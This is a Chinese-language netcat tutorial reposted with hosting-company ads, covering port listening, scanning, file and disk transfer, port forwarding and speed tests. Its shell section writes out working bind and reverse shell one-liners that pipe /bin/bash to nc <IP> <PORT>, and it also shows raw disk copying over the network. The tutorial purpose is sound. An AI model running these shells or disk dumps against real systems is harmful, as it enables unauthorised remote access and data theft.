這篇文章主要為大家詳細(xì)介紹了ncat使用的方法，文中示例代碼介紹的非常詳細(xì)，圖文詳解容易學(xué)習(xí)，非常適合初學(xué)者入門(mén)

目前創(chuàng)新互聯(lián)公司已為1000+的企業(yè)提供了網(wǎng)站建設(shè)、域名、虛擬空間、網(wǎng)站運(yùn)營(yíng)、企業(yè)網(wǎng)站設(shè)計(jì)、吉木薩爾網(wǎng)站維護(hù)等服務(wù)，公司將堅(jiān)持客戶(hù)導(dǎo)向、應(yīng)用為本的策略，正道將秉承"和諧、參與、激情"的文化，與客戶(hù)和合作伙伴齊心協(xié)力一起成長(zhǎng)，共同發(fā)展。

功能

1. 監(jiān)聽(tīng)本地端口
2. 連接目標(biāo)端口
3. 傳送文件
4. Remote Administration with Netcat（OSCP中給的分類(lèi)，不知道此分類(lèi)的作用，需要深入學(xué)習(xí)）
5. 反彈shell
6. 測(cè)兩臺(tái)機(jī)器間的網(wǎng)速

監(jiān)聽(tīng)本地端口

# 臨時(shí)監(jiān)聽(tīng)端口
nc -l <PORT> # 臨時(shí)監(jiān)聽(tīng)TCP端口一次
nc -lu <PORT> # 臨時(shí)監(jiān)聽(tīng)UDP端口

# 以監(jiān)聽(tīng)TCP端口為例，監(jiān)聽(tīng)UDP端口基本一樣

服務(wù)器端臨時(shí) 監(jiān)聽(tīng)端口

客戶(hù)端嘗試連接服務(wù)器端

建立TCP連接

客戶(hù)端斷開(kāi)連接時(shí)，服務(wù)器端也關(guān)閉端口的監(jiān)聽(tīng)

nc -lk <PORT> #永久監(jiān)聽(tīng)TCP端口
nc -lku <PORT> #永久監(jiān)聽(tīng)UDP端口
# 永久監(jiān)聽(tīng)：監(jiān)聽(tīng)端口，并且客戶(hù)端端來(lái)連接時(shí)，服務(wù)器端依舊監(jiān)聽(tīng)等待連接；并且支持多客戶(hù)端同時(shí)連接。UDP端口類(lèi)似。

連接目標(biāo)端口

# 在監(jiān)聽(tīng)部分可以找到連接的圖，接下來(lái)重點(diǎn)操作一下端口掃描；nc掃描端口會(huì)創(chuàng)建TCP三次握手連接，會(huì)造成一定的流量，容易被發(fā)現(xiàn)。
nc <IP> <PORT>  # 連接目標(biāo)TCP端口
nc -u <IP> <PORT> # 連接目標(biāo)UDP端口
# 使用上述命令連接tcp或UDP端口，連接成功后會(huì)阻塞在用戶(hù)輸入中，讓用戶(hù)與目標(biāo)端口進(jìn)行交互。此外還有一種非交互模式，適合用來(lái)掃描端口。
nc -z <IP> <PORT> #掃描目標(biāo)TCP端口
nc -zu <IP> <PORT> # 掃描目標(biāo)UDP端口
#  -w參數(shù)的適用場(chǎng)景：掃描UDP端口；網(wǎng)絡(luò)狀況不好。在網(wǎng)絡(luò)狀況良好是，掃描TCP端口沒(méi)有必要使用此參數(shù)。
nc -z -w1 <IP> <PORT> range

傳送文件

此部分需要兩臺(tái)機(jī)器的配合

A機(jī)：數(shù)據(jù)存儲(chǔ)機(jī)器
B機(jī)：備份機(jī)器

TCP傳送文件

B: nc -l <PORT> > filename
A: nc <IP> <PORT> < filename

文件傳送完成后，連接自動(dòng)斷開(kāi)

UDP傳送文件

#B
nc -lu <PORT> > filename

#A
nc -u <IP> <PORT> < filename

# 文件傳輸完成后，連接不會(huì)斷開(kāi)，可反復(fù)連接B機(jī)進(jìn)行文件傳輸。

# UDP更適合做一個(gè)日志接受端，其他的機(jī)器都把通過(guò)nc把日志寫(xiě)入到監(jiān)聽(tīng)的UDP機(jī)器上

傳送目錄

# 傳送目錄與傳送文件是一樣的，只是通過(guò)tar將目錄打包為壓縮文件傳過(guò)去并自定tar解包，實(shí)現(xiàn)傳送目錄的功能
#B
nc -l <PORT> | tar zxvf -

#A
tar zcf - * | nc <IP> <PORT>

傳送分區(qū)

B: nc -l <PORT> | dd of=/dev/sda
A: dd if=/dev/sda | nc <IP> <PORT>

反彈shell

# nc有-e選項(xiàng)時(shí)

#server
nc -l <PORT> -e /bin/bash -i

#client
nc <IP> <PORT>

# nc沒(méi)有-e選項(xiàng)時(shí)，創(chuàng)建正向shell

#server
mkfifo /tmp/fifo && cat /tmp/fifo | /bin/bash -i 2>&1 | nc -l <PORT> > /tmp/fifo

#client
nc <IP> <PORT>

# 創(chuàng)建反向shell(服務(wù)器端連接客戶(hù)端，然后受客戶(hù)端控制)
#client: 
nc <IP> <PORT>

#server: 
mkfifo /tmp/fifo && cat /tmp/fifo | /bin/bash -i 2>&1 | nc <IP> <PORT> > /tmp/fifo && rm -rf /tmp/fifo

端口轉(zhuǎn)發(fā)

# server
nc -l <target port>
mkfifo /tmp/fifo && cat /tmp/fifo | nc localhost <target port> | nc -l <listen port> > /tmp/fifo

# client
nc -n <IP> <listen port>

測(cè)機(jī)器間網(wǎng)速

A: nc -l <PORT> >/dev/null
B: nc <IP> <PORT> < /dev/zero
A、B:watch -n 1 "/sbin/ifconfig <interface> | grep bytes"

本文在介紹關(guān)于ncat使用的基礎(chǔ)上，重點(diǎn)探討了其具體步驟，本文內(nèi)容緊湊，希望大家可以有所收獲。如果想了解更多，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道！

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務(wù)器15元起步，三天無(wú)理由+7*72小時(shí)售后在線，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性?xún)r(jià)比高”等特點(diǎn)與優(yōu)勢(shì)，專(zhuān)為企業(yè)上云打造定制，能夠滿(mǎn)足用戶(hù)豐富、多元化的應(yīng)用場(chǎng)景需求。

新聞名稱(chēng)：ncat使用匯總-創(chuàng)新互聯(lián)
本文網(wǎng)址：http://jinyejixie.com/article10/csogdo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供關(guān)鍵詞優(yōu)化、營(yíng)銷(xiāo)型網(wǎng)站建設(shè)、App設(shè)計(jì)、手機(jī)網(wǎng)站建設(shè)、定制網(wǎng)站、企業(yè)建站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)